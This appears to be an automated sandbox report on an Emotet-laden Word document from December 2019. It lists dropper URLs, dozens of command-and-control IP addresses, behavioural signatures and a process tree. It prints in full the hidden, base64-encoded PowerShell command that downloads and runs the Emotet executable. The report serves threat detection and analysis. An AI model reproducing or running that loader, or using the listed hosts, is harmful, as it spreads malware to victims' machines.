ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

General
Target

ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

Filesize

N/A

Completed

24-12-2019 23:22

Score
10 /10
SHA256

ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

Malware Config

Extracted

Language ps1
Source
URLs
exe.dropper

https://www.spectaglobal.com/wp-admin/SELFt1969/

exe.dropper

http://www.emir-elbahr.com/wp-admin/css/1u8825/

exe.dropper

https://www.jwtrubber.com/wp-content/73LYb/

exe.dropper

https://adanzyeyapi.com/wp-includes/dD6121/

exe.dropper

https://www.smartwebdns.net/_vti_bin/0QRGg70/

Extracted

Family emotet
C2

177.180.115.224:80

177.242.21.126:80

190.210.236.139:80

144.217.117.207:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

5.88.27.67:8080

37.187.6.63:8080

186.15.83.52:8080

201.213.32.59:80

97.81.12.153:80

178.79.163.131:8080

138.68.106.4:7080

217.199.160.224:8080

181.61.143.177:80

189.19.81.181:443

186.68.48.204:443

118.36.70.245:80

80.11.158.65:8080

68.187.160.28:443

116.48.138.115:80

190.161.180.184:80

200.123.183.137:443

159.203.204.126:8080

85.152.208.146:80

151.237.36.220:80

96.61.113.203:80

191.103.76.34:443

2.139.158.136:443

163.172.40.218:7080

83.248.141.198:80

46.101.212.195:8080

2.44.167.52:80

46.28.111.142:7080

142.93.114.137:8080

181.231.220.232:80

74.59.187.94:80

139.162.118.88:8080

93.67.154.252:443

203.25.159.3:8080

202.62.39.111:80

109.169.86.13:8080

142.127.57.63:8080

5.196.35.138:7080

37.120.185.153:443

96.38.234.10:80

83.165.78.227:80

181.198.203.45:443

2.45.112.134:80

rsa_pubkey.plain
Signatures 12

Filter: none

Discovery
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4840WINWORD.EXE
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE73.exe73.exe

    Reported IOCs

    pidprocess
    4840WINWORD.EXE
    462873.exe
    380073.exe
  • Suspicious use of FindShellTrayWindow
    WINWORD.EXE

    Reported IOCs

    pidprocess
    4840WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    Powershell.exe

    Reported IOCs

    pidprocess
    4468Powershell.exe
  • Suspicious behavior: EmotetMutantsSpam
    73.exe

    Reported IOCs

    pidprocess
    380073.exe
  • Enumerates system info in registry

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  • Process spawned unexpected child process
    Powershell.exe

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process44684220Powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    Powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege4468Powershell.exe
  • Suspicious use of WriteProcessMemory
    Powershell.exe73.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4468 wrote to memory of 46284468Powershell.exe73.exe
    PID 4628 wrote to memory of 3800462873.exe73.exe
  • Executes dropped EXE
    73.exe73.exe

    Reported IOCs

    pidprocess
    462873.exe
    380073.exe
  • Checks processor information in registry

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptionioc
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails

Processes 4
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839.doc" /o ""
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of FindShellTrayWindow
    PID:4840
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABLAGoAeABmAGkAcQBnAGMAZQB6AGcAcAB3AD0AJwBYAHEAYQBtAHoAbwBkAHcAeQAnADsAJABHAHMAdQBpAHMAYQBxAGQAbgBnAHEAIAA9ACAAJwA3ADMAJwA7ACQAVwBoAGwAYwBnAHgAcgB3AGEAawBvAHYAYwA9ACcAQgB0AG8AdAB3AGcAbABnAHcAZwBkACcAOwAkAE4AawB5AGoAeABrAHAAaABqAGkAdQBkAHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAcwB1AGkAcwBhAHEAZABuAGcAcQArACcALgBlAHgAZQAnADsAJABIAG0AegBlAGQAcwBrAHYAdAB3AD0AJwBFAHcAZgBtAGMAZgBrAHAAYQBiAGQAagAnADsAJABHAGoAeQBrAHcAYgBkAHUAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAQwBMAEkAZQBuAHQAOwAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBwAGUAYwB0AGEAZwBsAG8AYgBhAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFMARQBMAEYAdAAxADkANgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQBtAGkAcgAtAGUAbABiAGEAaAByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBjAHMAcwAvADEAdQA4ADgAMgA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBqAHcAdAByAHUAYgBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADcAMwBMAFkAYgAvACoAaAB0AHQAcABzADoALwAvAGEAZABhAG4AegB5AGUAeQBhAHAAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZABEADYAMQAyADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAbQBhAHIAdAB3AGUAYgBkAG4AcwAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8AMABRAFIARwBnADcAMAAvACcALgAiAFMAUABMAGAASQBUACIAKAAnACoAJwApADsAJABSAGwAYQBvAHcAYwBqAGgAcAA9ACcASgBzAGsAegB0AGkAdwBwAGIAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQASwBlAGcAbwBmAGoAcAB0AGoAIABpAG4AIAAkAFAAZgBvAHQAbQBkAGoAZABhAGwAYgApAHsAdAByAHkAewAkAEcAagB5AGsAdwBiAGQAdQAuACIAZABgAE8AdwBgAE4ATABgAE8AQQBkAEYASQBsAEUAIgAoACQASwBlAGcAbwBmAGoAcAB0AGoALAAgACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABVAHQAYQB0AHkAagBmAGkAcAA9ACcAQQB5AHUAZQBhAHcAaAB3AGgAcQBhAHMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABOAGsAeQBqAHgAawBwAGgAagBpAHUAZAB0ACkALgAiAEwARQBOAGAAZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA3ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBrAHkAagB4AGsAcABoAGoAaQB1AGQAdAApADsAJABIAHQAZwB1AGcAcABpAGYAZwB2AHYAPQAnAFkAagBmAHYAbwB3AGoAYQB5AGUAJwA7AGIAcgBlAGEAawA7ACQAVAB2AGMAcAB0AGEAbgB1AGkAYgBtAGMAPQAnAEYAcwB0AG4AagBlAG4AdwB5AHgAawAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAcQBpAG8AawBiAG0AdQA9ACcATgB1AGkAbwBkAHcAeABkAGEAegBxACcA
    Suspicious behavior: EnumeratesProcesses
    Process spawned unexpected child process
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\73.exe
      "C:\Users\Admin\73.exe"
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      Executes dropped EXE
      PID:4628
      • C:\Users\Admin\73.exe
        --54dcd426
        Suspicious use of SetWindowsHookEx
        Suspicious behavior: EmotetMutantsSpam
        Executes dropped EXE
        PID:3800
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\Users\Admin\73.exe

                        • C:\Users\Admin\73.exe

                        • C:\Users\Admin\73.exe

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

                        • memory/3800-12-0x0000000002170000-0x0000000002187000-memory.dmp

                        • memory/3800-13-0x0000000000400000-0x00000000004AA000-memory.dmp

                        • memory/4628-9-0x00000000022D0000-0x00000000022E7000-memory.dmp

                        • memory/4840-2-0x000002189F520000-0x000002189F524000-memory.dmp